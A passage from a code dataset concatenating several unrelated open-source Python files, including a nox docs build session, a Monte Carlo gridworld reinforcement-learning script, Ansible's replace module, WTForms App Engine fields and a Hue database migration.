    """Build the HTML documentation for this library with sphinx."""
    session.install("-e", ".")
    session.install("sphinx==4.0.1", "alabaster", "recommonmark")

    # always start from a clean build directory:
    shutil.rmtree(os.path.join("docs", "_build"), ignore_errors=True)
    sphinx_args = [
        "sphinx-build",
        "-W",  # warnings as errors
        "-T",  # show full traceback on exception
        "-N",  # no colors
        "-b",
        "html",
        "-d",
        os.path.join("docs", "_build", "doctrees", ""),
        os.path.join("docs", ""),
        os.path.join("docs", "_build", "html", ""),
    ]
    session.run(*sphinx_args)
@nox.session(python=DEFAULT_PYTHON_VERSION)
def docfx(session):
    """Build the docfx yaml files for this library.

    Not part of the default session list; only needs to run in the
    'docs-presubmit' build.
    """
    session.install("-e", ".")
    session.install(
        "sphinx==4.0.1", "alabaster", "recommonmark", "gcp-sphinx-docfx-yaml"
    )

    # always start from a clean build directory:
    shutil.rmtree(os.path.join("docs", "_build"), ignore_errors=True)
    session.run(
        "sphinx-build",
        "-T",  # show full traceback on exception
        "-N",  # no colors
        "-D",
        (
            "extensions=sphinx.ext.autodoc,"
            "sphinx.ext.autosummary,"
            "docfx_yaml.extension,"
            "sphinx.ext.intersphinx,"
            "sphinx.ext.coverage,"
            "sphinx.ext.napoleon,"
            "sphinx.ext.todo,"
            "sphinx.ext.viewcode,"
            "recommonmark"
        ),
        "-b",
        "html",
        "-d",
        os.path.join("docs", "_build", "doctrees", ""),
        os.path.join("docs", ""),
        os.path.join("docs", "_build", "html", ""),
    )
HerdOfBears/Learning_Machine_Learning | Reinforcement Learning/monte_carlo_epsilon_greedy.py | 1 | 4207 |
import numpy as np
from reinforcement.gridworld import standard_grid, negative_grid
from reinforcement.iterative_policy_eval import print_policy, print_IPE_result
# the four grid-world moves: up, down, right, left
ALL_POSSIBLE_ACTIONS = ["U","D","R","L"]
# discount factor used when accumulating returns
GAMMA = 0.9
def reverse(lst):
    """Return a new list with the elements of *lst* in reverse order.

    The input sequence is left unmodified.
    """
    # the built-in reversed() replaces the original hand-rolled index loop;
    # wrapping in list() keeps the original "always returns a list" contract
    # for any sequence input.
    return list(reversed(lst))
def sample_mean(lst):
    """Return the arithmetic mean of the values in *lst*.

    Raises ZeroDivisionError for an empty list, matching the original
    behaviour.
    """
    # direct sum/len replaces the original (1.0/n)*tot formulation and
    # avoids one unnecessary rounding step.
    return sum(lst) / len(lst)
def eps_greedy(s, Q, policy):
    """Epsilon-greedy update of ``policy`` for state ``s``.

    With probability 0.1 a random action is chosen; otherwise the action
    with the highest Q value recorded for ``s`` is chosen (keeping the
    current action when no entry beats -inf).  The mutated policy dict is
    returned.
    """
    epsilon = 0.1
    if np.random.rand() <= epsilon:
        # explore: pick any action uniformly at random
        policy[s] = np.random.choice(ALL_POSSIBLE_ACTIONS)
        return policy
    # exploit: argmax over all (state, action) keys recorded for s
    best_value = float("-inf")
    best_action = policy[s]
    for state_action in Q.keys():
        if state_action[0] == s and Q[state_action] > best_value:
            best_value = Q[state_action]
            best_action = state_action[1]
    policy[s] = best_action
    return policy
def play_episode(policy):
    """Play one episode on the global gridworld ``g`` following *policy*
    epsilon-greedily, and return a list of (state, action, return) triples.

    The episode always starts in state (2, 0).
    """
    # start --> tuple: (s, a), s is a tuple (i,j). So, ( (i,j), a )
    global g
    #random_start = list(g.actions.keys())[np.random.choice(len(g.actions.keys()))]
    #random_action = np.random.choice(ALL_POSSIBLE_ACTIONS)
    epsilon = 0.1
    # epsilon-greedy choice of the first action:
    p = np.random.rand()
    if p <= epsilon:
        temp_start1 = np.random.choice(ALL_POSSIBLE_ACTIONS)
        start = ((2,0),temp_start1)
    else:
        start = ((2,0),policy[(2,0)])
    g.set_state(start[0])
    s0 = g.current_state()
    a0 = start[1]
    states_actions_and_rewards = [(s0,a0,0)]
    # NOTE(review): prev_s, prev2_s and seen_states are collected but never
    # used below.
    prev_s = s0
    prev2_s = None
    s = g.current_state()
    action = a0
    seen_states = [s0]
    # NOTE:
    # r(t) refers to the reward acquired from performing a(t-1) in state s(t-1)
    while True:
        prev_s = s
        r = g.move(action)
        s = g.current_state()
        # print("prev_s = ", prev_s, " s = ", s," action = ", action)
        if g.game_over():
            # terminal state has no action:
            states_actions_and_rewards.append((s,None,r))
            break
        else:
            # epsilon-greedy choice of the next action:
            random_num = np.random.rand()
            if random_num <= epsilon:
                action = np.random.choice(ALL_POSSIBLE_ACTIONS)
            else:
                action = policy[s]
            states_actions_and_rewards.append((s,action,r))
            seen_states.append(s)
    # Game is over. Now compute the actual return.
    G = 0
    states_actions_and_returns = []
    # Start at the last state and reward because the return is calculated
    # from the final to the initial state
    # (it depends on the reward of the final state)
    first = True
    for s,a,r in reversed(states_actions_and_rewards):
        if first:
            # skip the terminal state, it has no return
            first = False
        else:
            states_actions_and_returns.append((s,a,G))
        G = r + GAMMA*G
    # restore chronological order:
    states_actions_and_returns.reverse()
    return states_actions_and_returns
def monte_carlo_ES(P,N,Q):
    """First-visit Monte-Carlo control on the global gridworld ``g``.

    Despite the name, exploration comes from the epsilon-greedy behaviour in
    play_episode rather than exploring starts.  Mutates and returns the
    policy P and action-value function Q.
    """
    # P --> policy, dict state -> action
    # N --> Number of episodes to play
    # Q --> action-value function, dict (state, action) -> value
    global g
    # NOTE(review): 'states' is computed but never used.
    states = g.all_states()
    # sample returns observed for each (state, action) pair:
    returns = {}
    for s in g.all_states():
        if s not in g.actions:
            continue
        for a in ALL_POSSIBLE_ACTIONS:
            returns[(s,a)] = []
    deltas = []
    # NOTE(review): biggest_change is never reset inside the episode loop,
    # so 'deltas' records a running maximum over ALL episodes, not the
    # per-episode change.
    biggest_change = 0
    for i in range(N):
        # states_actions_returns is a list of 3-tuples [(s,a,G)];
        # the state, the action taken, and the return
        seen_before = []
        states_actions_returns = play_episode(P)
        print("Iteration = ",i)
        for s,a,G in states_actions_returns:
            # first-visit MC: only the first occurrence of (s, a) counts
            if (s,a) not in seen_before:
                seen_before.append((s,a))
                old_Q = Q[(s,a)]
                returns[(s,a)].append(G)
                Q[(s,a)] = sample_mean(returns[(s,a)])
                biggest_change = max(biggest_change, np.abs(old_Q - Q[(s,a)]))
        deltas.append(biggest_change)
        # Update the policy using epsilon greedy method.
        for s in P.keys():
            max_Q = float("-inf")
            # NOTE(review): prev_P is assigned but never used.
            prev_P = P[s]
            max_a = P[s]
            # Get the argmax[a]{ Q(s,a) }
            for tup in Q.keys():
                if s == tup[0]:
                    a = tup[1]
                    if Q[(s,a)]>max_Q:
                        max_Q = Q[(s,a)]
                        max_a = a
            P[s] = max_a
    return P,Q
def main():
    """Run Monte-Carlo control on the negative gridworld and print the
    resulting policy and some Q values."""
    global g
    g = negative_grid()
    #g = standard_grid()
    global gamma
    gamma = 0.9
    states = g.all_states()
    # initialize the action-value function and a random policy
    Q = {}
    policy={}
    for s in states:
        if s in g.actions:
            for a in ALL_POSSIBLE_ACTIONS:
                Q[(s,a)] = 0#np.random.rand()
            policy[s] = np.random.choice(ALL_POSSIBLE_ACTIONS)
        else:
            # terminal / blocked states get no policy entry
            pass
    optimal_policy,Q = monte_carlo_ES(policy, 5000, Q)
    print_policy(optimal_policy,g)
    # print the value of the chosen action in each non-terminal state:
    for s in g.actions:
        print('s=',s,' ',Q[s,optimal_policy[s]])
    print(Q[(2,3),"L"])
| mit |
cchurch/ansible | lib/ansible/modules/files/replace.py | 38 | 10934 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2013, Evan Kaufman <evan@digitalflophouse.com
# Copyright: (c) 2017, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: replace
author: Evan Kaufman (@EvanK)
extends_documentation_fragment:
- files
- validate
short_description: Replace all instances of a particular string in a
file using a back-referenced regular expression
description:
- This module will replace all instances of a pattern within a file.
- It is up to the user to maintain idempotence by ensuring that the
same pattern would never match any replacements made.
version_added: "1.6"
options:
path:
description:
- The file to modify.
- Before Ansible 2.3 this option was only usable as I(dest), I(destfile) and I(name).
type: path
required: true
aliases: [ dest, destfile, name ]
regexp:
description:
- The regular expression to look for in the contents of the file.
- Uses Python regular expressions; see
U(http://docs.python.org/2/library/re.html).
- Uses MULTILINE mode, which means C(^) and C($) match the beginning
and end of the file, as well as the beginning and end respectively
of I(each line) of the file.
- Does not use DOTALL, which means the C(.) special character matches
any character I(except newlines). A common mistake is to assume that
a negated character set like C([^#]) will also not match newlines.
- In order to exclude newlines, they must be added to the set like C([^#\n]).
- Note that, as of Ansible 2.0, short form tasks should have any escape
sequences backslash-escaped in order to prevent them being parsed
as string literal escapes. See the examples.
type: str
required: true
replace:
description:
- The string to replace regexp matches.
- May contain backreferences that will get expanded with the regexp capture groups if the regexp matches.
- If not set, matches are removed entirely.
- Backreferences can be used ambiguously like C(\1), or explicitly like C(\g<1>).
type: str
after:
description:
- If specified, only content after this match will be replaced/removed.
- Can be used in combination with C(before).
- Uses Python regular expressions; see
U(http://docs.python.org/2/library/re.html).
- Uses DOTALL, which means the C(.) special character I(can match newlines).
type: str
version_added: "2.4"
before:
description:
- If specified, only content before this match will be replaced/removed.
- Can be used in combination with C(after).
- Uses Python regular expressions; see
U(http://docs.python.org/2/library/re.html).
- Uses DOTALL, which means the C(.) special character I(can match newlines).
type: str
version_added: "2.4"
backup:
description:
- Create a backup file including the timestamp information so you can
get the original file back if you somehow clobbered it incorrectly.
type: bool
default: no
others:
description:
- All arguments accepted by the M(file) module also work here.
type: str
encoding:
description:
- The character encoding for reading and writing the file.
type: str
default: utf-8
version_added: "2.4"
notes:
- As of Ansible 2.3, the I(dest) option has been changed to I(path) as default, but I(dest) still works as well.
- As of Ansible 2.7.10, the combined use of I(before) and I(after) works properly. If you were relying on the
previous incorrect behavior, you may be need to adjust your tasks.
See U(https://github.com/ansible/ansible/issues/31354) for details.
- Option I(follow) has been removed in Ansible 2.5, because this module modifies the contents of the file so I(follow=no) doesn't make sense.
'''
EXAMPLES = r'''
- name: Before Ansible 2.3, option 'dest', 'destfile' or 'name' was used instead of 'path'
replace:
path: /etc/hosts
regexp: '(\s+)old\.host\.name(\s+.*)?$'
replace: '\1new.host.name\2'
- name: Replace after the expression till the end of the file (requires Ansible >= 2.4)
replace:
path: /etc/apache2/sites-available/default.conf
after: 'NameVirtualHost [*]'
regexp: '^(.+)$'
replace: '# \1'
- name: Replace before the expression till the begin of the file (requires Ansible >= 2.4)
replace:
path: /etc/apache2/sites-available/default.conf
before: '# live site config'
regexp: '^(.+)$'
replace: '# \1'
# Prior to Ansible 2.7.10, using before and after in combination did the opposite of what was intended.
# see https://github.com/ansible/ansible/issues/31354 for details.
- name: Replace between the expressions (requires Ansible >= 2.4)
replace:
path: /etc/hosts
after: '<VirtualHost [*]>'
before: '</VirtualHost>'
regexp: '^(.+)$'
replace: '# \1'
- name: Supports common file attributes
replace:
path: /home/jdoe/.ssh/known_hosts
regexp: '^old\.host\.name[^\n]*\n'
owner: jdoe
group: jdoe
mode: '0644'
- name: Supports a validate command
replace:
path: /etc/apache/ports
regexp: '^(NameVirtualHost|Listen)\s+80\s*$'
replace: '\1 127.0.0.1:8080'
validate: '/usr/sbin/apache2ctl -f %s -t'
- name: Short form task (in ansible 2+) necessitates backslash-escaped sequences
replace: path=/etc/hosts regexp='\\b(localhost)(\\d*)\\b' replace='\\1\\2.localdomain\\2 \\1\\2'
- name: Long form task does not
replace:
path: /etc/hosts
regexp: '\b(localhost)(\d*)\b'
replace: '\1\2.localdomain\2 \1\2'
- name: Explicitly specifying positional matched groups in replacement
replace:
path: /etc/ssh/sshd_config
regexp: '^(ListenAddress[ ]+)[^\n]+$'
replace: '\g<1>0.0.0.0'
- name: Explicitly specifying named matched groups
replace:
path: /etc/ssh/sshd_config
regexp: '^(?P<dctv>ListenAddress[ ]+)(?P<host>[^\n]+)$'
replace: '#\g<dctv>\g<host>\n\g<dctv>0.0.0.0'
'''
import os
import re
import tempfile
from ansible.module_utils._text import to_text, to_bytes
from ansible.module_utils.basic import AnsibleModule
def write_changes(module, contents, path):
    """Write *contents* to a temp file, optionally run the validate command
    against it, and atomically move it onto *path* when it passes."""
    tmp_fd, tmp_path = tempfile.mkstemp(dir=module.tmpdir)
    with os.fdopen(tmp_fd, 'wb') as tmp_file:
        tmp_file.write(contents)

    validate = module.params.get('validate', None)
    valid = not validate
    if validate:
        # The validate command template must reference the temp file once.
        if "%s" not in validate:
            module.fail_json(msg="validate must contain %%s: %s" % (validate))
        rc, out, err = module.run_command(validate % tmp_path)
        valid = rc == 0
        if rc != 0:
            module.fail_json(msg='failed to validate: rc:%s error:%s' % (rc, err))
    if valid:
        module.atomic_move(tmp_path, path, unsafe_writes=module.params['unsafe_writes'])
def check_file_attrs(module, changed, message):
    """Apply the common file attribute arguments (owner, mode, selinux, ...)
    and extend (message, changed) when any attribute was updated."""
    file_args = module.load_file_common_arguments(module.params)
    attrs_changed = module.set_file_attributes_if_different(file_args, False)
    if attrs_changed:
        prefix = message + " and " if changed else message
        message = prefix + "ownership, perms or SE linux context changed"
        changed = True
    return message, changed
def main():
    """Module entry point: replace regexp matches in a file, optionally
    bounded by before/after patterns, with diff/backup/validate support."""
    module = AnsibleModule(
        argument_spec=dict(
            path=dict(type='path', required=True, aliases=['dest', 'destfile', 'name']),
            regexp=dict(type='str', required=True),
            replace=dict(type='str', default=''),
            after=dict(type='str'),
            before=dict(type='str'),
            backup=dict(type='bool', default=False),
            validate=dict(type='str'),
            encoding=dict(type='str', default='utf-8'),
        ),
        add_file_common_args=True,
        supports_check_mode=True,
    )

    params = module.params
    path = params['path']
    encoding = params['encoding']
    res_args = dict()

    # Decode all pattern/replacement params up front so every regex operation
    # below works on text, never on bytes.
    params['after'] = to_text(params['after'], errors='surrogate_or_strict', nonstring='passthru')
    params['before'] = to_text(params['before'], errors='surrogate_or_strict', nonstring='passthru')
    params['regexp'] = to_text(params['regexp'], errors='surrogate_or_strict', nonstring='passthru')
    params['replace'] = to_text(params['replace'], errors='surrogate_or_strict', nonstring='passthru')

    if os.path.isdir(path):
        module.fail_json(rc=256, msg='Path %s is a directory !' % path)

    if not os.path.exists(path):
        module.fail_json(rc=257, msg='Path %s does not exist !' % path)
    else:
        # Read raw bytes and decode with the requested encoding.
        f = open(path, 'rb')
        contents = to_text(f.read(), errors='surrogate_or_strict', encoding=encoding)
        f.close()

    # Build a DOTALL pattern that captures the subsection bounded by
    # after/before (either or both may be given).
    pattern = u''
    if params['after'] and params['before']:
        pattern = u'%s(?P<subsection>.*?)%s' % (params['after'], params['before'])
    elif params['after']:
        pattern = u'%s(?P<subsection>.*)' % params['after']
    elif params['before']:
        pattern = u'(?P<subsection>.*)%s' % params['before']

    if pattern:
        section_re = re.compile(pattern, re.DOTALL)
        match = re.search(section_re, contents)
        if match:
            section = match.group('subsection')
            # Remember where the subsection sits so it can be spliced back in.
            indices = [match.start('subsection'), match.end('subsection')]
        else:
            res_args['msg'] = 'Pattern for before/after params did not match the given file: %s' % pattern
            res_args['changed'] = False
            module.exit_json(**res_args)
    else:
        section = contents

    # result is (new_text, number_of_substitutions).
    mre = re.compile(params['regexp'], re.MULTILINE)
    result = re.subn(mre, params['replace'], section, 0)

    if result[1] > 0 and section != result[0]:
        if pattern:
            # Splice the rewritten subsection back into the full contents.
            result = (contents[:indices[0]] + result[0] + contents[indices[1]:], result[1])
        msg = '%s replacements made' % result[1]
        changed = True
        if module._diff:
            res_args['diff'] = {
                'before_header': path,
                'before': contents,
                'after_header': path,
                'after': result[0],
            }
    else:
        msg = ''
        changed = False

    if changed and not module.check_mode:
        if params['backup'] and os.path.exists(path):
            res_args['backup_file'] = module.backup_local(path)
        # We should always follow symlinks so that we change the real file
        path = os.path.realpath(path)
        write_changes(module, to_bytes(result[0], encoding=encoding), path)

    res_args['msg'], res_args['changed'] = check_file_attrs(module, changed, msg)
    module.exit_json(**res_args)
if __name__ == '__main__':
main()
| gpl-3.0 |
FigNewtons/google-python-exercises | logpuzzle/logpuzzle.py | 147 | 1564 | #!/usr/bin/python
# Copyright 2010 Google Inc.
# Licensed under the Apache License, Version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
# Google's Python Class
# http://code.google.com/edu/languages/google-python-class/
import os
import re
import sys
import urllib
"""Logpuzzle exercise
Given an apache logfile, find the puzzle urls and download the images.
Here's what a puzzle url looks like:
10.254.254.28 - - [06/Aug/2007:00:13:48 -0700] "GET /~foo/puzzle-bar-aaab.jpg HTTP/1.0" 302 528 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
"""
def read_urls(filename):
    """Returns a list of the puzzle urls from the given log file,
    extracting the hostname from the filename itself.
    Screens out duplicate urls and returns the urls sorted into
    increasing order."""
    # +++your code here+++
    # NOTE: exercise stub -- intentionally unimplemented (returns None).
def download_images(img_urls, dest_dir):
    """Given the urls already in the correct order, downloads
    each image into the given directory.
    Gives the images local filenames img0, img1, and so on.
    Creates an index.html in the directory
    with an img tag to show each local image file.
    Creates the directory if necessary.
    """
    # +++your code here+++
    # NOTE: exercise stub -- intentionally unimplemented.
def main():
    """Command-line entry point (Python 2 syntax): parse an optional
    --todir flag and a logfile argument, then extract/download the urls."""
    args = sys.argv[1:]
    if not args:
        print 'usage: [--todir dir] logfile '
        sys.exit(1)
    # Consume the optional --todir flag and its value.
    todir = ''
    if args[0] == '--todir':
        todir = args[1]
        del args[0:2]
    img_urls = read_urls(args[0])
    # With a destination, download; otherwise just list the urls.
    if todir:
        download_images(img_urls, todir)
    else:
        print '\n'.join(img_urls)
| apache-2.0 |
biodrone/plex-desk | desk/flask/lib/python3.4/site-packages/pkg_resources/_vendor/packaging/_structures.py | 906 | 1809 | # Copyright 2014 Donald Stufft
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, division, print_function
class Infinity(object):
    """Sentinel value that compares greater than every other object."""

    def __repr__(self):
        return "Infinity"

    def __hash__(self):
        return hash(repr(self))

    # Equality holds only against another instance of this sentinel.
    def __eq__(self, other):
        return isinstance(other, self.__class__)

    def __ne__(self, other):
        return not self.__eq__(other)

    # Nothing is greater than Infinity, so < and <= are always false ...
    def __lt__(self, other):
        return False

    def __le__(self, other):
        return False

    # ... and > and >= are always true.
    def __gt__(self, other):
        return True

    def __ge__(self, other):
        return True

    def __neg__(self):
        return NegativeInfinity


# Replace the class with its singleton instance.
Infinity = Infinity()
class NegativeInfinity(object):
    """Sentinel value that compares less than every other object."""

    def __repr__(self):
        return "-Infinity"

    def __hash__(self):
        return hash(repr(self))

    # Equality holds only against another instance of this sentinel.
    def __eq__(self, other):
        return isinstance(other, self.__class__)

    def __ne__(self, other):
        return not self.__eq__(other)

    # -Infinity sorts below everything, so < and <= are always true ...
    def __lt__(self, other):
        return True

    def __le__(self, other):
        return True

    # ... and > and >= are always false.
    def __gt__(self, other):
        return False

    def __ge__(self, other):
        return False

    def __neg__(self):
        return Infinity


# Replace the class with its singleton instance.
NegativeInfinity = NegativeInfinity()
| mit |
zding5/Microblog-Flask | flask/lib/python2.7/site-packages/wtforms/ext/appengine/fields.py | 177 | 7574 | from __future__ import unicode_literals
import decimal
import operator
from wtforms import fields, widgets
from wtforms.compat import text_type, string_types
class ReferencePropertyField(fields.SelectFieldBase):
    """
    A field for ``db.ReferenceProperty``. The list items are rendered in a
    select.

    :param reference_class:
        A db.Model class which will be used to generate the default query
        to make the list of items. If this is not specified, The `query`
        property must be overridden before validation.
    :param get_label:
        If a string, use this attribute on the model class as the label
        associated with each option. If a one-argument callable, this callable
        will be passed model instance and expected to return the label text.
        Otherwise, the model object's `__str__` or `__unicode__` will be used.
    :param allow_blank:
        If set to true, a blank choice will be added to the top of the list
        to allow `None` to be chosen.
    :param blank_text:
        Use this to override the default blank option's label.
    """
    widget = widgets.Select()

    def __init__(self, label=None, validators=None, reference_class=None,
                 get_label=None, allow_blank=False,
                 blank_text='', **kwargs):
        super(ReferencePropertyField, self).__init__(label, validators,
                                                     **kwargs)
        # Normalize get_label into a one-argument callable.
        if get_label is None:
            self.get_label = lambda x: x
        elif isinstance(get_label, string_types):
            self.get_label = operator.attrgetter(get_label)
        else:
            self.get_label = get_label

        self.allow_blank = allow_blank
        self.blank_text = blank_text
        self._set_data(None)
        if reference_class is not None:
            self.query = reference_class.all()

    def _get_data(self):
        # Resolve lazily: the posted key string is matched against the query
        # results only when the data is actually read.
        if self._formdata is not None:
            for obj in self.query:
                if str(obj.key()) == self._formdata:
                    self._set_data(obj)
                    break
        return self._data

    def _set_data(self, data):
        # Setting data directly clears any pending posted key.
        self._data = data
        self._formdata = None

    data = property(_get_data, _set_data)

    def iter_choices(self):
        # Yield (value, label, selected) triples for rendering the select.
        if self.allow_blank:
            yield ('__None', self.blank_text, self.data is None)

        for obj in self.query:
            key = str(obj.key())
            label = self.get_label(obj)
            yield (key, label, (self.data.key() == obj.key()) if self.data else False)

    def process_formdata(self, valuelist):
        if valuelist:
            if valuelist[0] == '__None':
                self.data = None
            else:
                # Store the raw key; _get_data resolves it to an object later.
                self._data = None
                self._formdata = valuelist[0]

    def pre_validate(self, form):
        # A value is required unless a blank choice is explicitly allowed.
        if not self.allow_blank or self.data is not None:
            for obj in self.query:
                if str(self.data.key()) == str(obj.key()):
                    break
            else:
                raise ValueError(self.gettext('Not a valid choice'))
class KeyPropertyField(fields.SelectFieldBase):
    """
    A field for ``ndb.KeyProperty``. The list items are rendered in a select.

    :param reference_class:
        A db.Model class which will be used to generate the default query
        to make the list of items. If this is not specified, The `query`
        property must be overridden before validation.
    :param get_label:
        If a string, use this attribute on the model class as the label
        associated with each option. If a one-argument callable, this callable
        will be passed model instance and expected to return the label text.
        Otherwise, the model object's `__str__` or `__unicode__` will be used.
    :param allow_blank:
        If set to true, a blank choice will be added to the top of the list
        to allow `None` to be chosen.
    :param blank_text:
        Use this to override the default blank option's label.
    """
    widget = widgets.Select()

    def __init__(self, label=None, validators=None, reference_class=None,
                 get_label=None, allow_blank=False, blank_text='', **kwargs):
        super(KeyPropertyField, self).__init__(label, validators, **kwargs)
        # Normalize get_label into a one-argument callable.
        if get_label is None:
            self.get_label = lambda x: x
        elif isinstance(get_label, string_types):
            # Fix: was `basestring`, which does not exist on Python 3; use the
            # same compat alias as ReferencePropertyField above.
            self.get_label = operator.attrgetter(get_label)
        else:
            self.get_label = get_label

        self.allow_blank = allow_blank
        self.blank_text = blank_text
        self._set_data(None)
        if reference_class is not None:
            self.query = reference_class.query()

    def _get_data(self):
        # Resolve lazily: the posted key id is matched against the query
        # results only when the data is actually read.
        if self._formdata is not None:
            for obj in self.query:
                if str(obj.key.id()) == self._formdata:
                    self._set_data(obj)
                    break
        return self._data

    def _set_data(self, data):
        # Setting data directly clears any pending posted key id.
        self._data = data
        self._formdata = None

    data = property(_get_data, _set_data)

    def iter_choices(self):
        # Yield (value, label, selected) triples for rendering the select.
        if self.allow_blank:
            yield ('__None', self.blank_text, self.data is None)

        for obj in self.query:
            key = str(obj.key.id())
            label = self.get_label(obj)
            yield (key, label, (self.data.key == obj.key) if self.data else False)

    def process_formdata(self, valuelist):
        if valuelist:
            if valuelist[0] == '__None':
                self.data = None
            else:
                # Store the raw key id; _get_data resolves it later.
                self._data = None
                self._formdata = valuelist[0]

    def pre_validate(self, form):
        if self.data is not None:
            for obj in self.query:
                if self.data.key == obj.key:
                    break
            else:
                raise ValueError(self.gettext('Not a valid choice'))
        elif not self.allow_blank:
            raise ValueError(self.gettext('Not a valid choice'))
class StringListPropertyField(fields.TextAreaField):
    """
    A field for ``db.StringListProperty``. The list items are rendered in a
    textarea, one item per line.
    """

    def _value(self):
        # Prefer the raw submitted payload; otherwise join the stored list.
        if self.raw_data:
            return self.raw_data[0]
        if self.data:
            return text_type("\n".join(self.data))
        return ''

    def process_formdata(self, valuelist):
        if valuelist:
            try:
                # One list entry per submitted line.
                self.data = valuelist[0].splitlines()
            except ValueError:
                raise ValueError(self.gettext('Not a valid list'))
class IntegerListPropertyField(fields.TextAreaField):
    """
    A field for ``db.IntegerListProperty``. The list items are rendered in a
    textarea, one integer per line.

    (Docstring previously said StringListProperty, copied from the field
    above.)
    """

    def _value(self):
        if self.raw_data:
            return self.raw_data[0]
        # Fix: self.data holds ints after process_formdata, and str.join
        # raises TypeError on non-string items -- stringify each value first.
        return text_type('\n'.join(text_type(value) for value in self.data)) if self.data else ''

    def process_formdata(self, valuelist):
        if valuelist:
            try:
                # One integer per submitted line.
                self.data = [int(value) for value in valuelist[0].splitlines()]
            except ValueError:
                raise ValueError(self.gettext('Not a valid integer list'))
class GeoPtPropertyField(fields.TextField):
    """A field for ``db.GeoPtProperty``; accepts "lat, lon" text input and
    normalizes it through ``decimal.Decimal``."""

    def process_formdata(self, valuelist):
        if not valuelist:
            return
        try:
            raw_lat, raw_lon = valuelist[0].split(',')
            lat = decimal.Decimal(raw_lat.strip())
            lon = decimal.Decimal(raw_lon.strip())
        except (decimal.InvalidOperation, ValueError):
            raise ValueError('Not a valid coordinate location')
        self.data = '%s,%s' % (lat, lon)
| mit |
xq262144/hue | apps/useradmin/src/useradmin/migrations/0003_remove_metastore_readonly_huepermission.py | 37 | 5620 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
class Migration(DataMigration):
    """Remove the obsolete 'metastore read-only' HuePermission (the reverse
    migration recreates it)."""

    def forwards(self, orm):
        """Delete the 'metastore / read_only_access' permission if present."""
        # NOTE(review): this uses the live model rather than the frozen
        # orm['useradmin.HuePermission']; confirm that is intended.
        from useradmin.models import HuePermission
        try:
            perm = HuePermission.objects.get(app='metastore', action='read_only_access')
            perm.delete()
        except HuePermission.DoesNotExist:
            pass

    def backwards(self, orm):
        """Recreate the permission removed by forwards()."""
        # Fix: HuePermission was only imported locally inside forwards(), so
        # running this migration backwards raised NameError.
        from useradmin.models import HuePermission
        perm, created = HuePermission.objects.get_or_create(app='metastore', action='read_only_access')

    # Frozen model state captured by South at the time of the migration.
    models = {
        'auth.group': {
            'Meta': {'object_name': 'Group'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        'auth.permission': {
            'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        'auth.user': {
            'Meta': {'object_name': 'User'},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        },
        'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        'useradmin.grouppermission': {
            'Meta': {'object_name': 'GroupPermission'},
            'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.Group']"}),
            'hue_permission': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['useradmin.HuePermission']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
        },
        'useradmin.huepermission': {
            'Meta': {'object_name': 'HuePermission'},
            'action': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'app': ('django.db.models.fields.CharField', [], {'max_length': '30'}),
            'description': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
